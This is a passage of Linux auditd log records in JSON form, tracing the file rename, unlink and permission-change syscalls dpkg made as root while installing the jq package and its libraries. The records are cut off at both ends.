"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0x81a4"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:576",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 93,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x0",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808429,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:577",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xb",
"0x1a4",
"0x0",
"0x2"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 808429,
"dev": "fd:00",
"mode": "0o100000",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.901:578",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "no",
"exit": "-2",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556ebaf26ed0",
"0xfffffffffffffe98",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.905:579",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.905:580",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-2",
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f20",
"0x556eb8dcab07",
"0x556eb8dcabc0",
"0xa1ff"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.905:581",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 94,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0x556ebaf26f70",
"0x0",
"0x0",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/libjq.so.1.dpkg-new",
"inode": 808430,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.905:582",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/lib/x86_64-linux-gnu/libjq.so.1.0.4.dpkg-new",
"inode": 808426,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/lib/x86_64-linux-gnu/libjq.so.1.0.4",
"inode": 808426,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.905:583",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/libjq1/changelog.Debian.gz.dpkg-new",
"inode": 808428,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/libjq1/changelog.Debian.gz",
"inode": 808428,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.909:584",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x1",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/share/doc/libjq1/",
"inode": 808427,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/share/doc/libjq1/copyright.dpkg-new",
"inode": 808429,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/share/doc/libjq1/copyright",
"inode": 808429,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.909:585",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556ebaf26f70",
"0x556ebaf26ed0",
"0x556ebaf26ed0",
"0x0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/usr/lib/x86_64-linux-gnu/",
"inode": 786675,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/usr/lib/x86_64-linux-gnu/libjq.so.1.dpkg-new",
"inode": 808430,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/usr/lib/x86_64-linux-gnu/libjq.so.1",
"inode": 808430,
"dev": "fd:00",
"mode": "0o120777",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.909:586",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 91,
"success": "yes",
"exit": 0,
"items": 1,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "perm_mod",
"ARGV": [
"0xa",
"0x1a4",
"0x0",
"0x1b6"
]
},
"PATH": [
{
"item": 0,
"name": null,
"inode": 277177,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "NORMAL",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.909:587",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba2a6940",
"0x556eba59cec0",
"0x556eba7a8600",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/info/libjq1:amd64.list-new",
"inode": 277177,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libjq1:amd64.list",
"inode": 277177,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:588",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556ebb16c32e",
"0x8",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/symbols",
"inode": 277172,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:589",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556eba45b580",
"0x556eba45b580",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/info/",
"inode": 267112,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 2,
"name": "/var/lib/dpkg/tmp.ci/symbols",
"inode": 277172,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 3,
"name": "/var/lib/dpkg/info/libjq1:amd64.symbols",
"inode": 277172,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "CREATE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:590",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556ebb16c34e",
"0x8",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/control",
"inode": 276990,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:591",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 84,
"success": "no",
"exit": "-20",
"items": 2,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556ebb16c36e",
"0x9",
"0x556eb8ddb8a0"
]
},
"CWD": {
"cwd": "/"
},
"PATH": [
{
"item": 0,
"name": "/var/lib/dpkg/tmp.ci/",
"inode": 276984,
"dev": "fd:00",
"mode": "0o40755",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "PARENT",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
},
{
"item": 1,
"name": "/var/lib/dpkg/tmp.ci/triggers",
"inode": 277174,
"dev": "fd:00",
"mode": "0o100644",
"ouid": 0,
"ogid": 0,
"rdev": "00:00",
"nametype": "DELETE",
"cap_fp": "0x0",
"cap_fi": "0x0",
"cap_fe": 0,
"cap_fver": "0x0",
"cap_frootid": "0"
}
],
"PROCTITLE": {
"ARGV": [
"/usr/bin/dpkg",
"--status-fd",
"41",
"--no-triggers",
"--unpack",
"--auto-deconfigure",
"/var/cache/apt/archives/libonig5_6.9.4-1_amd64.deb",
"/var/c"
]
},
"PARENT_INFO": {
"ARGV": [
"apt",
"install",
"jq"
],
"launch_time": 1632470474.349,
"ppid": 1185
}
}
{
"ID": "1632470477.913:592",
"SYSCALL": {
"arch": "0xc000003e",
"syscall": 82,
"success": "yes",
"exit": 0,
"items": 4,
"ppid": 7575,
"pid": 7624,
"auid": 1000,
"uid": 0,
"gid": 0,
"euid": 0,
"suid": 0,
"fsuid": 0,
"egid": 0,
"sgid": 0,
"fsgid": 0,
"tty": "pts1",
"ses": 3,
"comm": "dpkg",
"exe": "/usr/bin/dpkg",
"key": "delete",
"ARGV": [
"0x556eba6c9130",
"0x556eba45b580",
"0x556eba45b580",
